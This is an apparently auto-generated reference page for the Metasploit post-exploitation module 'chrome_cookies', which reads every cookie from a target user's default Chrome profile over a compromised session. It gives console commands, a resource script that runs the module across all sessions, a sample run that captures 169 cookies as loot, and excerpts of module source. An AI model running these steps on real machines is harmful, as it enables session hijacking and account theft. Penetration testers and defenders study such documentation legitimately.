Chrome Gather Cookies - Metasploit
This page contains detailed information about how to use the post/multi/gather/chrome_cookies metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Chrome Gather Cookies
Module: post/multi/gather/chrome_cookies
Source code: modules/post/multi/gather/chrome_cookies.rb
Disclosure date: -
Last modification time: 2019-01-15 07:19:46 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Read all cookies from the Default Chrome profile of the target user.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/chrome_cookies
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/chrome_cookies
msf post(chrome_cookies) > show options
... show and set options ...
msf post(chrome_cookies) > set SESSION session-id
msf post(chrome_cookies) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/gather/chrome_cookies")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Gather Chrome Cookies
Reads all cookies from the Default Chrome Profile on the target machine. Uses Headless Chrome and Chrome's Remote Debugging.
Opsec
Disk writes
This writes randomly-named files to disk temporarily. You may want to consider the tradeoff between getting the user's Chrome cookies and the noisiness of writing to disk.
The module writes a random 10-15 character file containing HTML to a directory you can specify via WRITABLE_DIR
.
Running processes
On non-Windows non-meterpreter sessions, a headless Chrome process will be left running after module execution is completed. You can still find and kill this process manually after the module execution is completed.
Vulnerable Application
This module works on Chrome 59 or later on all operating systems. This module has been tested on Windows, Linux, and OSX.
Chrome does not need to be running on the target machine for this module to work.
Verification Steps
- Obtain a session on the target machine
- Do:
use post/multi/gather/chrome_cookies
- Do:
set SESSION <your session ID>
- Do:
run
- The current user's Chrome cookies will be stored as loot
Options
CHROME_BINARY_PATH
The path to the user's Chrome binary. On Linux this defaults to searching for google-chrome
in $PATH
. On macOS, this defaults to /Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
. If the module doesn't find any cookies, it may be that a different Chrome binary to the one the user normally uses is being run. In that case, you can change the Chrome binary executed with this option.
WRITABLE_DIR
Directory used to write temporary files.
Two files are written, with random 10-15 character alphanumeric filenames. One file contains an html file for Chrome and the other is where the cookies are saved. Both files are deleted during cleanup.
REMOTE_DEBUGGING_PORT
Port to tell Chrome to expose Remote Debugging on. Default is the normal remote debugging port, 9222
.
Scenarios
Windows
Suppose you've got a session on the target machine.
To extract the target user's Chrome cookies
msf > use post/multi/gather/chrome_cookies
msf post(multi/gather/chrome_cookies) > options
Module options (post/multi/gather/chrome_cookies):
Name Current Setting Required Description
---- --------------- -------- -----------
CHROME_BINARY_PATH no The path to the user's Chrome binary (leave blank to use the default for the OS)
REMOTE_DEBUGGING_PORT 9222 no Port on target machine to use for remote debugging protocol
SESSION 1 yes The session to run this module on.
WRITEABLE_DIR no Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\Local\Temp)
msf post(multi/gather/chrome_cookies) > set session
session =>
msf post(multi/gather/chrome_cookies) > run
[*] Determining session platform
[*] Platform: windows
[*] Type: meterpreter
[*] Activated Chrome's Remote Debugging (pid: 9452) via "\Program Files (x86)\Google\Chrome\Application\chrome.exe" --window-position=0,0 --enable-logging --v=1 --disable-translate --disable-extensions --disable-background-networking --safebrowsing-disable-auto-update --disable-sync --metrics-recording-only --disable-default-apps --mute-audio --no-first-run --disable-web-security --disable-plugins --disable-gpu --user-data-dir="\Users\msfdev\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=9222 \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html
[+] Found Match
[+] 169 Chrome Cookies stored in /home/msfdev/.msf4/loot/20190108065112_default_172.22.222.200_chrome.gather.co_082863.txt
[*] Removing file \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html
[*] Removing file \Users\msfdev\AppData\Local\Google\Chrome\User Data\chrome_debug.log
[*] Post module execution completed
msf5 post(multi/gather/chrome_cookies) >
Future features
Profiles
This module only extracts cookies from the default Chrome profile. The target may have multiple, and you may which to extract cookies from all of them. This would require enumerating and extracting the profiles by name. Example code to extract cookies from a non-default Chrome profile can be found at https://github.com/defaultnamehere/cookie_crimes.
See also
See https://github.com/defaultnamehere/cookie_crimes for more information and manual instructions for Windows.
See https://mango.pdf.zone/stealing-chrome-cookies-without-a-password for the blog post in which this technique was first published.
Go back to menu.
Msfconsole Usage
Here is how the multi/gather/chrome_cookies post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/chrome_cookies
msf6 post(multi/gather/chrome_cookies) > show info
Name: Chrome Gather Cookies
Module: post/multi/gather/chrome_cookies
Platform: Linux, Unix, BSD, OSX, Windows
Arch:
Rank: Normal
Provided by:
mangopdf <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CHROME_BINARY_PATH no The path to the user's Chrome binary (leave blank to use the default for the OS)
REMOTE_DEBUGGING_PORT 9222 no Port on target machine to use for remote debugging protocol
SESSION yes The session to run this module on.
WRITEABLE_DIR no Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\Local\Temp)
Description:
Read all cookies from the Default Chrome profile of the target user.
Module Options
This is a complete list of options available in the multi/gather/chrome_cookies post exploitation module:
msf6 post(multi/gather/chrome_cookies) > show options
Module options (post/multi/gather/chrome_cookies):
Name Current Setting Required Description
---- --------------- -------- -----------
CHROME_BINARY_PATH no The path to the user's Chrome binary (leave blank to use the default for the OS)
REMOTE_DEBUGGING_PORT 9222 no Port on target machine to use for remote debugging protocol
SESSION yes The session to run this module on.
WRITEABLE_DIR no Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\Local\Temp)
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/chrome_cookies post exploitation module:
msf6 post(multi/gather/chrome_cookies) > show advanced
Module advanced options (post/multi/gather/chrome_cookies):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/chrome_cookies module can do:
msf6 post(multi/gather/chrome_cookies) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/chrome_cookies post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/chrome_cookies) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unsupported platform: <SESSION.PLATFORM>
Here is a relevant code snippet related to the "Unsupported platform: <SESSION.PLATFORM>" error message:
53: chrome = '"\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"'
54: user_data_dir = "\\Users\\#{username}\\AppData\\Local\\Google\\Chrome\\User Data"
55: temp_storage_dir = temp_storage_dir.nil? ? "\\Users\\#{username}\\AppData\\Local\\Temp" : temp_storage_dir
56: @cookie_storage_path = "#{user_data_dir}\\chrome_debug.log"
57: else
58: fail_with Failure::NoTarget, "Unsupported platform: #{session.platform}"
59: end
60:
61: unless datastore['CHROME_BINARY_PATH'].empty?
62: chrome = datastore['CHROME_BINARY_PATH']
63: end
<TEMP_STORAGE_DIR> is not writable
Here is a relevant code snippet related to the "<TEMP_STORAGE_DIR> is not writable" error message:
63: end
64:
65: =begin
66: # #writable? not supported on windows
67: unless writable? @temp_storage_dir
68: fail_with Failure::BadConfig, "#{@temp_storage_dir} is not writable"
69: end
70: =end
71:
72: @html_storage_path = create_cookie_stealing_html(temp_storage_dir)
73:
Failed to retrieve cookie data
Here is a relevant code snippet related to the "Failed to retrieve cookie data" error message:
200: print_good('Found Match')
201: cookies_msg = line
202: end
203: }
204:
205: fail_with(Failure::Unknown, 'Failed to retrieve cookie data') if cookies_msg.empty?
206:
207: # Slice off the "REMOTE_DEBUGGING|" delimiter and trailing source info
208: cookies_json = cookies_msg.split("REMOTE_DEBUGGING|")[1]
209: cookies_json.split('", source: file')[0]
210: end
No session found, giving up
Here is a relevant code snippet related to the "No session found, giving up" error message:
214: loot = store_loot ltype, ctype, session, data, nil, msg
215: print_good "#{msg} stored in #{loot}"
216: end
217:
218: def run
219: fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?
220:
221: # Issues with write_file. Maybe a path problem?
222: if session.platform == 'windows' && session.type == 'shell'
223: fail_with Failure::BadConfig, 'Windows shell session not support, giving up'
224: end
Windows shell session not support, giving up
Here is a relevant code snippet related to the "Windows shell session not support, giving up" error message:
218: def run
219: fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?
220:
221: # Issues with write_file. Maybe a path problem?
222: if session.platform == 'windows' && session.type == 'shell'
223: fail_with Failure::BadConfig, 'Windows shell session not support, giving up'
224: end
225:
226: unless session.platform == 'windows' && session.type == 'meterpreter'
227: print_warning 'This module will leave a headless Chrome process running on the target machine.'
228: end
This module will leave a headless Chrome process running on the target machine.
Here is a relevant code snippet related to the "This module will leave a headless Chrome process running on the target machine." error message:
222: if session.platform == 'windows' && session.type == 'shell'
223: fail_with Failure::BadConfig, 'Windows shell session not support, giving up'
224: end
225:
226: unless session.platform == 'windows' && session.type == 'meterpreter'
227: print_warning 'This module will leave a headless Chrome process running on the target machine.'
228: end
229:
230: configure_for_platform
231: cookies = get_cookies
232: cookies_parsed = JSON.parse cookies
Go back to menu.
Related Pull Requests
- #11245 Merged Pull Request: Update documentation for post/multi/gather/chrome_cookies
- #11052 Merged Pull Request: Gather chrome cookies post module
See Also
Check also the following modules related to this module:
- post/multi/gather/apple_ios_backup
- post/multi/gather/aws_ec2_instance_metadata
- post/multi/gather/aws_keys
- post/multi/gather/check_malware
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_hexchat
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/saltstack_salt
- post/multi/gather/skype_enum
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- mangopdf <mangodotpdf[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.